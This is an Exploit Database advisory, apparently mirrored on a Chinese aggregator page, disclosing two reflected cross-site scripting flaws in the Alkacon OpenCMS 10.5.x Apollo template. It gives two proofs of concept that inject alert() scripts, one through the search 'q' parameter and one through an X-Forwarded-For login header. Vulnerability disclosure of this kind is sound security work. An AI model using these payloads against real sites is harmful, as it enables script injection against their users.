Alkacon OpenCMS 10.5.x – Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： Aetsu
  日期： 2019-09-02
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47338/

• # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
  # Google Dork: N/A
  # Date: 18/07/2019
  # Exploit Author: Aetsu
  # Vendor Homepage: http://www.opencms.org
  # Software Link: https://github.com/alkacon/apollo-template
  # Version: 10.5.x
  # Tested on: 10.5.5 / 10.5.4
  # CVE : CVE-2019-13234, CVE-2019-13235
  
  1. Reflected XSS in the search engine:
  - Affected resource -> "q"
  POC:
  ```
  https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
  ```
  2. Reflected XSS in login form:
  POC:
  The vulnerability appears when the header X-Forwarded-For is used as shown
  in the next request:
  ```
  GET
  /login/index.html?requestedResource=&name=Editor&password=editor&action=login
  HTTP/1.1
  Host: example.com
  X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
  ```
  
  
  Extended POCs: https://aetsu.github.io/OpenCms